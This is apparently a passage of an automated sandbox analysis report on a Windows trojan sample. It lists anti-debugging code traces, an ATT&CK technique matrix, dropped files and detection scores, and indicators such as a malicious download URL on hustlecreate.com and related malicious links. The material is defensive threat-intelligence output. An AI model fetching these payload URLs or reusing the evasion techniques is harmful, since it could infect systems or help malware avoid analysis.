      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80188E mov eax, dword ptr fs:[00000030h]4_2_1D80188E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80188E mov eax, dword ptr fs:[00000030h]4_2_1D80188E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D871889 mov eax, dword ptr fs:[00000030h]4_2_1D871889
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D871889 mov eax, dword ptr fs:[00000030h]4_2_1D871889
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D871889 mov eax, dword ptr fs:[00000030h]4_2_1D871889
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D81088E mov eax, dword ptr fs:[00000030h]4_2_1D81088E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D81088E mov edx, dword ptr fs:[00000030h]4_2_1D81088E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D81088E mov eax, dword ptr fs:[00000030h]4_2_1D81088E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80B890 mov eax, dword ptr fs:[00000030h]4_2_1D80B890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80B890 mov eax, dword ptr fs:[00000030h]4_2_1D80B890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80B890 mov eax, dword ptr fs:[00000030h]4_2_1D80B890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D888890 mov eax, dword ptr fs:[00000030h]4_2_1D888890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D888890 mov eax, dword ptr fs:[00000030h]4_2_1D888890
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8598B2 mov eax, dword ptr fs:[00000030h]4_2_1D8598B2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FB839 mov eax, dword ptr fs:[00000030h]4_2_1D7FB839
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8918DA mov eax, dword ptr fs:[00000030h]4_2_1D8918DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8918DA mov eax, dword ptr fs:[00000030h]4_2_1D8918DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8918DA mov eax, dword ptr fs:[00000030h]4_2_1D8918DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8918DA mov eax, dword ptr fs:[00000030h]4_2_1D8918DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CD818 mov eax, dword ptr fs:[00000030h]4_2_1D7CD818
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8048F0 mov eax, dword ptr fs:[00000030h]4_2_1D8048F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CD800 mov eax, dword ptr fs:[00000030h]4_2_1D7CD800
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8688FB mov eax, dword ptr fs:[00000030h]4_2_1D8688FB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3800 mov eax, dword ptr fs:[00000030h]4_2_1D7E3800
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3800 mov eax, dword ptr fs:[00000030h]4_2_1D7E3800
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3800 mov eax, dword ptr fs:[00000030h]4_2_1D7E3800
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]4_2_1D87F8F8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]4_2_1D87F8F8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]4_2_1D87F8F8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]4_2_1D87F8F8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]4_2_1D87F8F8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7DA8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7DA8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7DA8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7DA8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7DA8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7DA8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov esi, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]4_2_1D7FD8F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C819 mov eax, dword ptr fs:[00000030h]4_2_1D80C819
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C819 mov eax, dword ptr fs:[00000030h]4_2_1D80C819
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C78E1 mov eax, dword ptr fs:[00000030h]4_2_1D7C78E1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D58E0 mov eax, dword ptr fs:[00000030h]4_2_1D7D58E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D58E0 mov eax, dword ptr fs:[00000030h]4_2_1D7D58E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D58E0 mov eax, dword ptr fs:[00000030h]4_2_1D7D58E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D58E0 mov eax, dword ptr fs:[00000030h]4_2_1D7D58E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88F82B mov eax, dword ptr fs:[00000030h]4_2_1D88F82B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_1D812D10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		1
      Windows Service      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping221
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium11
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default AccountsScheduled Task/Job1
      DLL Side-Loading      		1
      Windows Service      		11
      Virtualization/Sandbox Evasion      		LSASS Memory11
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		Exfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)11
      Process Injection      		1
      Access Token Manipulation      		Security Account Manager1
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      DLL Side-Loading      		11
      Process Injection      		NTDS3
      File and Directory Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer113
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets14
      System Information Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common2
      Obfuscated Files or Information      		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Timestomp      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SecuriteInfo.com.W32.AIDetect.malware2.5627.exe19%VirustotalBrowse
      SecuriteInfo.com.W32.AIDetect.malware2.5627.exe12%ReversingLabsWin32.Trojan.Shelsy

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dll0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll3%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\uninstalla.exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\uninstalla.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\vm3dc003.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      hustlecreate.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      https://hustlecreate.com/a1/binned_SsGEV34.bin0%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      https://hustlecreate.com/a1/binned_SsGEV34.bin420%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      https://hustlecreate.com/a1/binned_SsGEV34.binY0%Avira URL Cloudsafe
      https://hustlecreate.com/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      hustlecreate.com
      		69.49.244.14
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://hustlecreate.com/a1/binned_SsGEV34.bintrue
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792493541.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://www.vmware.com/0vm3dc003.dll.2.drfalse
        		high
        http://www.symauth.com/rpa00SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drfalse
          		high
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792493541.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.vmware.com/0/SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drfalse
            		high
            https://github.com/dotnet/runtimeBSJBSystem.Runtime.CompilerServices.VisualC.dll.2.drfalse
              		high
              https://hustlecreate.com/a1/binned_SsGEV34.bin42SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.W32.AIDetect.malware2.5627.exe, uninstalla.exe.2.drfalse
                		high
                http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDSecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792807270.0000000000626000.00000008.00000001.01000000.00000005.sdmpfalse
                  		high
                  http://www.gopher.ftp://ftp.SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.symauth.com/cps0(SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drfalse
                    		high
                    https://hustlecreate.com/a1/binned_SsGEV34.binYSecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/dotnet/runtimeSystem.Runtime.CompilerServices.VisualC.dll.2.drfalse
                      		high
                      https://hustlecreate.com/SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649475257.0000000001964000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      69.49.244.14
                      		hustlecreate.comUnited States
                      		46606UNIFIEDLAYER-AS-1UStrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:634994
                      Start date and time: 27/05/202209:50:562022-05-27 09:50:56 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 14m 23s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                      Run name:Suspected Instruction Hammering
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal84.troj.evad.winEXE@3/11@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 14.6% (good quality ratio 14%)
                      • Quality average: 81%
                      • Quality standard deviation: 25.4%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 56
                      • Number of non-executed functions: 84
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Adjust boot time
                      • Enable AMSI

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      09:52:50API Interceptor1x Sleep call for process: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      UNIFIEDLAYER-AS-1USuoWaH0S2pE8lVyP.exeGet hashmaliciousBrowse
                      • 192.185.121.61
                      https://gilbertogil.com.br/Feedback1.phpGet hashmaliciousBrowse
                      • 162.241.226.70
                      https://www.evernote.com/shard/s670/sh/55910dd8-9887-4018-3dce-75c372206cc5/1536ce86c6cb14e023f30a8fc3201040Get hashmaliciousBrowse
                      • 69.49.247.60
                      Win32.Wannacry.dllGet hashmaliciousBrowse
                      • 162.146.153.136
                      https://nathanu.tk/.well-known/wp-content/smp/excelz/index.php&design=DAFBx6CPpccGet hashmaliciousBrowse
                      • 162.240.53.128
                      DOCUMENTO 97314542.xlsGet hashmaliciousBrowse
                      • 162.214.98.126
                      RFQ OM - RFQ No. OM-1267-V .exeGet hashmaliciousBrowse
                      • 142.4.0.135
                      SecuriteInfo.com.Trojan.DownloaderNET.290.19373.exeGet hashmaliciousBrowse
                      • 74.220.219.216
                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtfGet hashmaliciousBrowse
                      • 69.49.231.213
                      RH-1900171460.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      SecuriteInfo.com.W32.AIDetectNet.01.28145.exeGet hashmaliciousBrowse
                      • 192.185.96.179
                      http://bit.do/fUj2gGet hashmaliciousBrowse
                      • 50.87.233.13
                      SecuriteInfo.com.Variant.Strictor.269399.17280.exeGet hashmaliciousBrowse
                      • 192.185.136.135
                      https://heylink.me/gshdj/Get hashmaliciousBrowse
                      • 192.185.195.200
                      RH-1026234360.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      RH-3138609257.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      SecuriteInfo.com.Heur.MSIL.Benin.5.31453.exeGet hashmaliciousBrowse
                      • 162.241.60.19
                      http://khelowars.com/Get hashmaliciousBrowse
                      • 162.215.222.33
                      RH-1825560422.xlsbGet hashmaliciousBrowse
                      • 192.185.211.19
                      proforma invoice pdf.exeGet hashmaliciousBrowse
                      • 192.185.112.181

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Variant.FakeAlert.2.24488.exeGet hashmaliciousBrowse
                      • 69.49.244.14
                      LdbyBADfIR.exeGet hashmaliciousBrowse
                      • 69.49.244.14
                      https://express.adobe.com/page/vCTYm3h0r9BmZ/Get hashmaliciousBrowse
                      • 69.49.244.14
                      SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                      • 69.49.244.14
                      http://akrurl.com/.2zpesGet hashmaliciousBrowse
                      • 69.49.244.14
                      TAX DOCUMENT.ppamGet hashmaliciousBrowse
                      • 69.49.244.14
                      https://www.paymentsjournal.com/analysts-coverage/Get hashmaliciousBrowse
                      • 69.49.244.14
                      Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                      • 69.49.244.14
                      Chrome.Quick.Update.ver.102.41.49568.jsGet hashmaliciousBrowse
                      • 69.49.244.14
                      https://servermail.nicepage.io/Home.htmlGet hashmaliciousBrowse
                      • 69.49.244.14
                      https://www.evernote.com/shard/s670/sh/55910dd8-9887-4018-3dce-75c372206cc5/1536ce86c6cb14e023f30a8fc3201040Get hashmaliciousBrowse
                      • 69.49.244.14
                      kyTwt6MpdH.exeGet hashmaliciousBrowse
                      • 69.49.244.14
                      https://www.extcovdoc125.org/Get hashmaliciousBrowse
                      • 69.49.244.14
                      https://bacguidelines.com/Get hashmaliciousBrowse
                      • 69.49.244.14
                      SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                      • 69.49.244.14
                      https://urlsand.esvalabs.com/?u=https%3A%2F%2Fexpress.adobe.com%2Fpage%2FfeoM5782aYABf%2F&e=d02f10fa&h=34edaf6a&f=y&p=yGet hashmaliciousBrowse
                      • 69.49.244.14
                      DOC.003242628829.DOC.exeGet hashmaliciousBrowse
                      • 69.49.244.14
                      Invoice_payment_confirmation_567.htmlGet hashmaliciousBrowse
                      • 69.49.244.14
                      http://updates.password-update.com/76aaf4998a4ea5a3?l=13Get hashmaliciousBrowse
                      • 69.49.244.14
                      https://www.ftaviation.com.co/gen/geo.htm#jacques.federspiel@hopitauxschuman.luGet hashmaliciousBrowse
                      • 69.49.244.14

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dllSecuriteInfo.com.W32.AIDetect.malware2.5627.exeGet hashmaliciousBrowse
                        SecuriteInfo.com.Variant.FakeAlert.2.24488.exeGet hashmaliciousBrowse
                          SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                            SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                              SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                          SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exeGet hashmaliciousBrowse
                                            SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
                                              SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
